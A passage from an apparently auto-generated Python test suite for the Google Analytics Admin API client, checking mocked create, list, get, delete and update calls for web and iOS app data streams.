arguments to the method. response = await client.update_web_data_stream( web_data_stream=resources.WebDataStream(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].web_data_stream == resources.WebDataStream(name="name_value") assert args[0].update_mask == field_mask_pb2.FieldMask(paths=["paths_value"]) @pytest.mark.asyncio async def test_update_web_data_stream_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.update_web_data_stream( analytics_admin.UpdateWebDataStreamRequest(), web_data_stream=resources.WebDataStream(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) def test_create_web_data_stream( transport: str = "grpc", request_type=analytics_admin.CreateWebDataStreamRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_web_data_stream), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.WebDataStream( name="name_value", measurement_id="measurement_id_value", firebase_app_id="firebase_app_id_value", default_uri="default_uri_value", display_name="display_name_value", ) response = client.create_web_data_stream(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.CreateWebDataStreamRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.WebDataStream) assert response.name == "name_value" assert response.measurement_id == "measurement_id_value" assert response.firebase_app_id == "firebase_app_id_value" assert response.default_uri == "default_uri_value" assert response.display_name == "display_name_value" def test_create_web_data_stream_from_dict(): test_create_web_data_stream(request_type=dict) def test_create_web_data_stream_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_web_data_stream), "__call__" ) as call: client.create_web_data_stream() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.CreateWebDataStreamRequest() @pytest.mark.asyncio async def test_create_web_data_stream_async( transport: str = "grpc_asyncio", request_type=analytics_admin.CreateWebDataStreamRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_web_data_stream), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.WebDataStream( name="name_value", measurement_id="measurement_id_value", firebase_app_id="firebase_app_id_value", default_uri="default_uri_value", display_name="display_name_value", ) ) response = await client.create_web_data_stream(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.CreateWebDataStreamRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.WebDataStream) assert response.name == "name_value" assert response.measurement_id == "measurement_id_value" assert response.firebase_app_id == "firebase_app_id_value" assert response.default_uri == "default_uri_value" assert response.display_name == "display_name_value" @pytest.mark.asyncio async def test_create_web_data_stream_async_from_dict(): await test_create_web_data_stream_async(request_type=dict) def test_create_web_data_stream_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.CreateWebDataStreamRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_web_data_stream), "__call__" ) as call: call.return_value = resources.WebDataStream() client.create_web_data_stream(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] @pytest.mark.asyncio async def test_create_web_data_stream_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.CreateWebDataStreamRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_web_data_stream), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.WebDataStream() ) await client.create_web_data_stream(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] def test_create_web_data_stream_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_web_data_stream), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.WebDataStream() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.create_web_data_stream( parent="parent_value", web_data_stream=resources.WebDataStream(name="name_value"), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" assert args[0].web_data_stream == resources.WebDataStream(name="name_value") def test_create_web_data_stream_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.create_web_data_stream( analytics_admin.CreateWebDataStreamRequest(), parent="parent_value", web_data_stream=resources.WebDataStream(name="name_value"), ) @pytest.mark.asyncio async def test_create_web_data_stream_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_web_data_stream), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.WebDataStream() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.WebDataStream() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.create_web_data_stream( parent="parent_value", web_data_stream=resources.WebDataStream(name="name_value"), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" assert args[0].web_data_stream == resources.WebDataStream(name="name_value") @pytest.mark.asyncio async def test_create_web_data_stream_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.create_web_data_stream( analytics_admin.CreateWebDataStreamRequest(), parent="parent_value", web_data_stream=resources.WebDataStream(name="name_value"), ) def test_list_web_data_streams( transport: str = "grpc", request_type=analytics_admin.ListWebDataStreamsRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_web_data_streams), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = analytics_admin.ListWebDataStreamsResponse( next_page_token="next_page_token_value", ) response = client.list_web_data_streams(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ListWebDataStreamsRequest() # Establish that the response is the type that we expect. assert isinstance(response, pagers.ListWebDataStreamsPager) assert response.next_page_token == "next_page_token_value" def test_list_web_data_streams_from_dict(): test_list_web_data_streams(request_type=dict) def test_list_web_data_streams_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_web_data_streams), "__call__" ) as call: client.list_web_data_streams() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ListWebDataStreamsRequest() @pytest.mark.asyncio async def test_list_web_data_streams_async( transport: str = "grpc_asyncio", request_type=analytics_admin.ListWebDataStreamsRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_web_data_streams), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.ListWebDataStreamsResponse( next_page_token="next_page_token_value", ) ) response = await client.list_web_data_streams(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ListWebDataStreamsRequest() # Establish that the response is the type that we expect. assert isinstance(response, pagers.ListWebDataStreamsAsyncPager) assert response.next_page_token == "next_page_token_value" @pytest.mark.asyncio async def test_list_web_data_streams_async_from_dict(): await test_list_web_data_streams_async(request_type=dict) def test_list_web_data_streams_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.ListWebDataStreamsRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_web_data_streams), "__call__" ) as call: call.return_value = analytics_admin.ListWebDataStreamsResponse() client.list_web_data_streams(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] @pytest.mark.asyncio async def test_list_web_data_streams_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.ListWebDataStreamsRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_web_data_streams), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.ListWebDataStreamsResponse() ) await client.list_web_data_streams(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] def test_list_web_data_streams_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_web_data_streams), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = analytics_admin.ListWebDataStreamsResponse() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.list_web_data_streams(parent="parent_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" def test_list_web_data_streams_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.list_web_data_streams( analytics_admin.ListWebDataStreamsRequest(), parent="parent_value", ) @pytest.mark.asyncio async def test_list_web_data_streams_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_web_data_streams), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = analytics_admin.ListWebDataStreamsResponse() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.ListWebDataStreamsResponse() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.list_web_data_streams(parent="parent_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" @pytest.mark.asyncio async def test_list_web_data_streams_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.list_web_data_streams( analytics_admin.ListWebDataStreamsRequest(), parent="parent_value", ) def test_list_web_data_streams_pager(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_web_data_streams), "__call__" ) as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListWebDataStreamsResponse( web_data_streams=[ resources.WebDataStream(), resources.WebDataStream(), resources.WebDataStream(), ], next_page_token="abc", ), analytics_admin.ListWebDataStreamsResponse( web_data_streams=[], next_page_token="def", ), analytics_admin.ListWebDataStreamsResponse( web_data_streams=[resources.WebDataStream(),], next_page_token="ghi", ), analytics_admin.ListWebDataStreamsResponse( web_data_streams=[ resources.WebDataStream(), resources.WebDataStream(), ], ), RuntimeError, ) metadata = () metadata = tuple(metadata) + ( gapic_v1.routing_header.to_grpc_metadata((("parent", ""),)), ) pager = client.list_web_data_streams(request={}) assert pager._metadata == metadata results = [i for i in pager] assert len(results) == 6 assert all(isinstance(i, resources.WebDataStream) for i in results) def test_list_web_data_streams_pages(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_web_data_streams), "__call__" ) as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListWebDataStreamsResponse( web_data_streams=[ resources.WebDataStream(), resources.WebDataStream(), resources.WebDataStream(), ], next_page_token="abc", ), analytics_admin.ListWebDataStreamsResponse( web_data_streams=[], next_page_token="def", ), analytics_admin.ListWebDataStreamsResponse( web_data_streams=[resources.WebDataStream(),], next_page_token="ghi", ), analytics_admin.ListWebDataStreamsResponse( web_data_streams=[ resources.WebDataStream(), resources.WebDataStream(), ], ), RuntimeError, ) pages = list(client.list_web_data_streams(request={}).pages) for page_, token in zip(pages, ["abc", "def", "ghi", ""]): assert page_.raw_page.next_page_token == token @pytest.mark.asyncio async def test_list_web_data_streams_async_pager(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_web_data_streams), "__call__", new_callable=mock.AsyncMock, ) as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListWebDataStreamsResponse( web_data_streams=[ resources.WebDataStream(), resources.WebDataStream(), resources.WebDataStream(), ], next_page_token="abc", ), analytics_admin.ListWebDataStreamsResponse( web_data_streams=[], next_page_token="def", ), analytics_admin.ListWebDataStreamsResponse( web_data_streams=[resources.WebDataStream(),], next_page_token="ghi", ), analytics_admin.ListWebDataStreamsResponse( web_data_streams=[ resources.WebDataStream(), resources.WebDataStream(), ], ), RuntimeError, ) async_pager = await client.list_web_data_streams(request={},) assert async_pager.next_page_token == "abc" responses = [] async for response in async_pager: responses.append(response) assert len(responses) == 6 assert all(isinstance(i, resources.WebDataStream) for i in responses) @pytest.mark.asyncio async def test_list_web_data_streams_async_pages(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_web_data_streams), "__call__", new_callable=mock.AsyncMock, ) as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListWebDataStreamsResponse( web_data_streams=[ resources.WebDataStream(), resources.WebDataStream(), resources.WebDataStream(), ], next_page_token="abc", ), analytics_admin.ListWebDataStreamsResponse( web_data_streams=[], next_page_token="def", ), analytics_admin.ListWebDataStreamsResponse( web_data_streams=[resources.WebDataStream(),], next_page_token="ghi", ), analytics_admin.ListWebDataStreamsResponse( web_data_streams=[ resources.WebDataStream(), resources.WebDataStream(), ], ), RuntimeError, ) pages = [] async for page_ in (await client.list_web_data_streams(request={})).pages: pages.append(page_) for page_, token in zip(pages, ["abc", "def", "ghi", ""]): assert page_.raw_page.next_page_token == token def test_get_ios_app_data_stream( transport: str = "grpc", request_type=analytics_admin.GetIosAppDataStreamRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_ios_app_data_stream), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.IosAppDataStream( name="name_value", firebase_app_id="firebase_app_id_value", bundle_id="bundle_id_value", display_name="display_name_value", ) response = client.get_ios_app_data_stream(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetIosAppDataStreamRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.IosAppDataStream) assert response.name == "name_value" assert response.firebase_app_id == "firebase_app_id_value" assert response.bundle_id == "bundle_id_value" assert response.display_name == "display_name_value" def test_get_ios_app_data_stream_from_dict(): test_get_ios_app_data_stream(request_type=dict) def test_get_ios_app_data_stream_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_ios_app_data_stream), "__call__" ) as call: client.get_ios_app_data_stream() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetIosAppDataStreamRequest() @pytest.mark.asyncio async def test_get_ios_app_data_stream_async( transport: str = "grpc_asyncio", request_type=analytics_admin.GetIosAppDataStreamRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_ios_app_data_stream), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.IosAppDataStream( name="name_value", firebase_app_id="firebase_app_id_value", bundle_id="bundle_id_value", display_name="display_name_value", ) ) response = await client.get_ios_app_data_stream(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetIosAppDataStreamRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.IosAppDataStream) assert response.name == "name_value" assert response.firebase_app_id == "firebase_app_id_value" assert response.bundle_id == "bundle_id_value" assert response.display_name == "display_name_value" @pytest.mark.asyncio async def test_get_ios_app_data_stream_async_from_dict(): await test_get_ios_app_data_stream_async(request_type=dict) def test_get_ios_app_data_stream_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.GetIosAppDataStreamRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_ios_app_data_stream), "__call__" ) as call: call.return_value = resources.IosAppDataStream() client.get_ios_app_data_stream(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] @pytest.mark.asyncio async def test_get_ios_app_data_stream_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.GetIosAppDataStreamRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_ios_app_data_stream), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.IosAppDataStream() ) await client.get_ios_app_data_stream(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] def test_get_ios_app_data_stream_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_ios_app_data_stream), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.IosAppDataStream() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.get_ios_app_data_stream(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" def test_get_ios_app_data_stream_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.get_ios_app_data_stream( analytics_admin.GetIosAppDataStreamRequest(), name="name_value", ) @pytest.mark.asyncio async def test_get_ios_app_data_stream_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_ios_app_data_stream), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.IosAppDataStream() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.IosAppDataStream() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.get_ios_app_data_stream(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" @pytest.mark.asyncio async def test_get_ios_app_data_stream_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.get_ios_app_data_stream( analytics_admin.GetIosAppDataStreamRequest(), name="name_value", ) def test_delete_ios_app_data_stream( transport: str = "grpc", request_type=analytics_admin.DeleteIosAppDataStreamRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_ios_app_data_stream), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = None response = client.delete_ios_app_data_stream(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.DeleteIosAppDataStreamRequest() # Establish that the response is the type that we expect. assert response is None def test_delete_ios_app_data_stream_from_dict(): test_delete_ios_app_data_stream(request_type=dict) def test_delete_ios_app_data_stream_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_ios_app_data_stream), "__call__" ) as call: client.delete_ios_app_data_stream() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.DeleteIosAppDataStreamRequest() @pytest.mark.asyncio async def test_delete_ios_app_data_stream_async( transport: str = "grpc_asyncio", request_type=analytics_admin.DeleteIosAppDataStreamRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_ios_app_data_stream), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None) response = await client.delete_ios_app_data_stream(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.DeleteIosAppDataStreamRequest() # Establish that the response is the type that we expect. assert response is None @pytest.mark.asyncio async def test_delete_ios_app_data_stream_async_from_dict(): await test_delete_ios_app_data_stream_async(request_type=dict) def test_delete_ios_app_data_stream_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.DeleteIosAppDataStreamRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_ios_app_data_stream), "__call__" ) as call: call.return_value = None client.delete_ios_app_data_stream(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] @pytest.mark.asyncio async def test_delete_ios_app_data_stream_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.DeleteIosAppDataStreamRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_ios_app_data_stream), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None) await client.delete_ios_app_data_stream(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] def test_delete_ios_app_data_stream_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_ios_app_data_stream), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = None # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.delete_ios_app_data_stream(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" def test_delete_ios_app_data_stream_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.delete_ios_app_data_stream( analytics_admin.DeleteIosAppDataStreamRequest(), name="name_value", ) @pytest.mark.asyncio async def test_delete_ios_app_data_stream_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_ios_app_data_stream), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = None call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.delete_ios_app_data_stream(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" @pytest.mark.asyncio async def test_delete_ios_app_data_stream_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.delete_ios_app_data_stream( analytics_admin.DeleteIosAppDataStreamRequest(), name="name_value", ) def test_update_ios_app_data_stream( transport: str = "grpc", request_type=analytics_admin.UpdateIosAppDataStreamRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_ios_app_data_stream), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.IosAppDataStream( name="name_value", firebase_app_id="firebase_app_id_value", bundle_id="bundle_id_value", display_name="display_name_value", ) response = client.update_ios_app_data_stream(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.UpdateIosAppDataStreamRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.IosAppDataStream) assert response.name == "name_value" assert response.firebase_app_id == "firebase_app_id_value" assert response.bundle_id == "bundle_id_value" assert response.display_name == "display_name_value" def test_update_ios_app_data_stream_from_dict(): test_update_ios_app_data_stream(request_type=dict) def test_update_ios_app_data_stream_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_ios_app_data_stream), "__call__" ) as call: client.update_ios_app_data_stream() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.UpdateIosAppDataStreamRequest() @pytest.mark.asyncio async def test_update_ios_app_data_stream_async( transport: str = 